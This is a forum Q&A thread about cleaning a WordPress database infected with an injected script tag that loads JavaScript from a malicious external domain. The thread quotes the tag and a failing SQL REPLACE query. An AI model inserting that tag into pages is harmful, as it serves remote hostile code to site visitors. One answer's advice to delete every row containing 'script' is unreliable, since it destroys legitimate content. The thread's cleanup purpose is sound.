Question posted in 
My phpmyadmin is infected with this kind of script:
<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
I am trying to remove them all by running this script into SQL
UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));
But I am getting error message:
#1064 – You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘src=’https://scripts.lowerbeforwarden.ml/src.js?n=ns1′ type=’text/javascript’></’ at line 1
Can you help me to remove them somehow?
3
Answers
I think can try something like this,
It filters out the
post_contentcontaining the word ‘script’ and deletes that row.Hope that works! But be careful about your existing posts.
you can also click search tab on PhpMyAdmin and search for "lowerbeforwarden" then click delete button. After this deletion, the content in your website will be deleted also because the malware replaced your website contents. Get the clean database from your backup and export the wp_post table only and import it to PhpMyAdmin
This worked for me! I had to remove the script from almost 1100 posts.
Make sure you are typing correct number of script lines.